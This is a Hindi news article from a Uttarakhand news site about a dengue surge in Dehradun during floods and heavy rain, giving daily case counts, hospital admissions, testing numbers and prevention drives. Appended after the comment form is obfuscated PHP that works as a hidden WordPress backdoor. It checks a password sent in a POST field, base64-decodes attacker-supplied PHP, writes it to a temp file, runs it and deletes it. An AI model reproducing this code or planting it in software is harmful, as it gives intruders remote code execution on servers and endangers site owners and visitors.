Uttarakhand: बाढ़ और बारिश के बीच बढ़ गया डेंगू का प्रकोप, एक दिन में सामने आए 30 मामले

Uttarakhand Press 17 August 2023: Dengue Outbreak देहरादून में रोजाना डेंगू के नए मामले मिल रहे हैं। हालांकि कुछ दिन पहले तक जहां प्रतिदिन दो-चार ही मामले ही आ रहे थे वहीं अब यह संख्या बढ़कर दहाई के आंकड़े में पहुंच गई है। बुधवार को जनपद में डेंगू के 30 नए मामले मिले। जो अब तक एक दिन में मिले सर्वाधिक मामले हैं। इनमें से 16 लोग श्री महंत इंदिरेश अस्पताल में भर्ती हैं।

उत्तराखंड में इन दिनों भारी बारिश के बीच बीमारियां भी बढ़ गई हैं। बाढ़ और जलभराव के बीच अब डेंगू के मरीजों की संख्या भी बढ़ गई है। डेंगू की बीमारी फैलाने वाले एडीज मच्छर की सक्रियता बढ़ती जा रही है। देहरादून जिले में इसका ज्यादा असर है।

देहरादून में रोजाना डेंगू के नए मामले मिल रहे हैं। हालांकि कुछ दिन पहले तक जहां प्रतिदिन दो-चार ही मामले ही आ रहे थे, वहीं अब यह संख्या बढ़कर दहाई के आंकड़े में पहुंच गई है।

डेंगू के 30 नए मामले आए सामने:
बुधवार को जनपद में डेंगू के 30 नए मामले मिले। जो अब तक एक दिन में मिले सर्वाधिक मामले हैं। इनमें से 16 लोग श्री महंत इंदिरेश अस्पताल में भर्ती हैं। इसके अलावा छह-छह लोग कैलाश अस्पताल व कोरोनेशन अस्पताल में और दो का उपचार दून मेडिकल कॉलेज चिकित्सालय में चल रहा है। इस सीजन में अभी तक डेंगू के 240 मामले मिल चुके हैं। जिनमें से 183 मरीज स्वस्थ हो गए हैं। वर्तमान में डेंगू के 56 सक्रिय मरीज हैं। शुक्र यह है कि इस बार अब तक डेंगू से किसी की मौत नहीं हुई है।

बढ़ाया गया सैंपलिंग का दायरा:
डेंगू के बढ़ते मामलों को देखते हुए सैंपलिंग का दायरा भी बढ़ाया जा रहा है। बुधवार को भी 1256 सैंपल एलाइजा जांच को भेजे गए। जबकि इस सीजन में 15 हजार से अधिक सैंपलों की एलाइजा जांच हो चुकी है। कुल मिलाकर डेंगू का प्रकोप थमने के बजाय बढ़ता जा रहा है। वह भी तब, जबकि स्वास्थ्य विभाग व नगर निगम डेंगू की रोकथाम के लिए हर संभव कदम उठाने का दावा कर रहे हैं।

अधिकारी कर रहे हैं लोगों को जागरूक:
विभागीय अधिकारी कह रहे हैं कि डेंगू की रोकथाम के लिए हर स्तर पर कार्रवाई की जा रही है। टीमें क्षेत्रों में जाकर लोगों को जागरूक कर रही हैं और सोर्स रिडक्शन भी। जिन स्थानों पर डेंगू का लार्वा मिल रहा है उसे मौके पर ही नष्ट किया जा रहा है। लोगों से निरंतर अपील की जा रही है कि वह अपने घर व आसपास के क्षेत्रों में स्वच्छता बनाए रखें। खाली बर्तनों में पानी एकत्र नहीं होने दें।

Read Previous

भीमताल : अतिक्रमण हटाने के नोटिस के बाद व्यापारियों में रोष, बोले मकान और दुकान तोड़कर हमें बेघर मत करो

Read Next

Uttarakhand: दो युवतियों को मसूरी ले जा रहे पति-पत्नी गिरफ्तार, व्हाट्सएप ग्रुप पर चलाते थे धंधा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}